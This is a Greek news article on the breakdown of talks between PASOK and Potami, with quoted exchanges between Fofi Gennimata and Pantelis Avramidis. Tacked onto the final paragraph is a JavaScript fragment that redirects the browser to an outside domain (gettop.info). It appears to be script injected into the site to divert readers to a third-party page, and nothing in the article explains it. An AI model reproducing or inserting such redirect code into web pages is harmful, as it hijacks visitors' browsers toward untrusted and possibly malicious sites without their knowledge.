Διαφαινόμενο «ναυάγιο» στη συνεργασία ΠΑΣΟΚ-Ποταμιού

0
2

 

Σε… ναυάγιο φαίνεται ότι οδηγείται η συνεργασία Ποταμιού-ΠΑΣΟΚ πριν καν ακόμα καλά-καλά ξεκινήσει.  Ο εκπρόσωπος του Ποταμιού Παντελής Αβραμίδης σε δηλώσεις του κατηγόρησε ευθέως τη Φώφη Γεννηματά, ότι «όπως κληρονόμησε το ΠΑΣΟΚ, ονειρευόταν να κληρονομήσει το Ποτάμι» αν και άφησε ανοικτό ένα ενδεχόμενο συνεργασίας λέγοντας πως οι 11 θέσεις του Ποταμιού παραμένουν στο «τραπέζι», ενώ η Πρόεδρος της Δημοκρατικής Συμπαράταξης μιλώντας στον ραδιοφωνικό σταθμό Real FM κατηγόρησε, εμμέσως, τον Σταύρο Θεοδωράκη για έλλειψη μπέσας και υπαινίχθηκε ότι έχει σχεδιασμούς συνεργασίας με την ΝΔ.

Όπως ανέφερε η Φώφη Γεννηματά, «η κεντροαριστερά για να πετύχει, χρειάζεται μπέσα. Για μένα αυτό είναι το πρώτο. Πίστη στο εγχείρημα και μπέσα. Κατ’ επανάληψη έχω πει ότι όπως λέει και ο ελληνικός λαός, όποιος δεν θέλει να ζυμώσει δέκα μέρες κοσκινίζει. Εμείς έχουμε βάλει πολύ νερό στο κρασί μας, έχουμε δεχτεί πάρα πολλά πράγματα, έχουμε κάνει υποχωρήσεις. Δεν έχουμε απαντήσει σε διαρροές και σε ένα σωρό κουβέντες που έχουν ακουστεί δεξιά και αριστερά όλο αυτό το τελευταίο διάστημα. Γιατί το εγχείρημα είναι πολύ μεγάλο, πολύ σημαντικό και αφορά τη χώρα. Δεν πρόκειται για προσωπικές φιλοδοξίες.

Πρόκειται για εθνική ανάγκη. Αλλά εδώ τελειώνει αυτή η συζήτηση. Ξεκαθαρίζει ο καθένας τη θέση του. Και απέναντι και στα στελέχη του. Υπάρχουν εκατοντάδες στελέχη που δούλεψαν στην Επιτροπή Διαλόγου τους προηγούμενους μήνες για να μπορέσει να υπάρξει ένα προγραμματικό πλαίσιο. Γιατί κανείς όταν ξεκινάει να συζητάει με άλλους όμορους χώρους, όπως πιστεύει, πρέπει να δει εάν υπάρχει πρώτα μια προγραμματική βάση στην οποία μπορεί να συμφωνήσει. Και δεν μπήκαμε στη μέση όλοι εμείς για να μην δημιουργήσουμε προβλήματα.

Αφήσαμε τους ανθρώπους του χώρου να συζητήσουν και κατέληξαν. Και από τον Ιούλιο περιμένουμε να δούμε τις διαδικαστικές απόψεις του Ποταμιού. Και χθες είδαμε μια ανοιχτή επιστολή που λέει άλλα πράγματα. Είναι προφανές ότι κατευθύνονται στο να γίνουν συμπλήρωμα. Εμείς δεν θέλουμε να γίνουμε συμπλήρωμα κανενός. Ούτε του ΣΥΡΙΖΑ, ούτε της Ν.Δ. Γιατί αυτό δεν οδηγεί σε λύσεις και απαντήσεις για τον ελληνικό λαό» τόνισε χαρακτηριστικά.

Λίγο αργότερα «ήρθε» η απάντηση από τον Γραμματέα Οργανωτικού του Ποταμιού Παντελή Αβραμίδη, ο οποίος ανέφερε:
«Η κα Γεννηματά κληρονόμησε το ΠΑΣΟΚ, πίστεψε ότι μπορεί να κληρονομήσει και το Ποτάμι» σχολίασε ο γραμματέας Οργανωτικού του Ποταμιού Παντελής Αβραμίδης αναφορικά με τις δηλώσεις της προέδρου του ΠΑΣΟΚ ότι «η Κεντροαριστερά για να πετύχει, χρειάζεται μπέσα. Και πίστη στο εγχείρημα. Η ηγεσία του Ποταμιού δεν θέλει».
Ο κ. Αβραμίδης υπογράμμισε ότι το Ποτάμι επανέλαβε δημόσια και με ξεκάθαρο τρόπο «ναι! πάμε για ένα νέο Κίνημα».
«Όχι με στημένες κάλπες, όχι με σημαδεμένα χαρτιά αλλά με ανοιχτές διαδικασίες. Και επειδή η κυρία Γεννηματά αρέσκεται στις αναβολές, προτείναμε να ξεκινήσει η διαδικασία με κοινή συνέντευξη τύπου την εβδομάδα 19 με 24 Σεπτεμβρίου. Τι πιο σαφές;».
Πρόσθεσε πως προφανώς όμως η κ. Γεννηματά άλλα ονειρευόταν. «Βολεύεται στην ασφάλεια των μηχανισμών της και δεν θέλει μια ανοιχτή αναμέτρηση στην κοινωνία. Με πολλούς υποψηφίους, νέα πρόσωπα και πολιτική αντιπαράθεση».
Κατηγόρησε την πρόεδρο του ΠΑΣΟΚ ότι «κόντρα στη διάθεση των περισσότερων στελεχών του ΠΑΣΟΚ» προσδοκά συνεργασίες με τον «καλό ΣΥΡΙΖΑ. Και ενοχλήθηκαν που στην ανοιχτή επιστολή μας ήμασταν ξεκάθαροι. Το νέο Κίνημα πρέπει να κινηθεί μακριά από συντηρητικούς και λαϊκιστές. Η κυβερνητική συνεργασία με τους ΣΥΡΙΖΑΝΕΛ δεν είναι επιλογή για τους πολίτες που πιστεύουν στον προοδευτικό εκσυγχρονισμό και τις μεταρρυθμίσεις. Όμως όλα αυτά και άλλα πολλά μπορούν να συζητηθούν στην «προεκλογική περίοδο» για την εκλογή του νέου αρχηγού και να αποφασιστούν από το συνέδριο που θα συγκληθεί» αναφέρει.
Τέλος, προειδοποίησε ότι όσοι τορπιλίζουν τον διάλογο στην τελική του φάση, απογοητεύουν τον προοδευτικό κόσμο και τόνισε ότι το Ποτάμι θα επιμείνει, καθώς οι 11 προτάσεις για τη σύσταση του νέου Κινήματος παραμένουν στο τραπέζι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here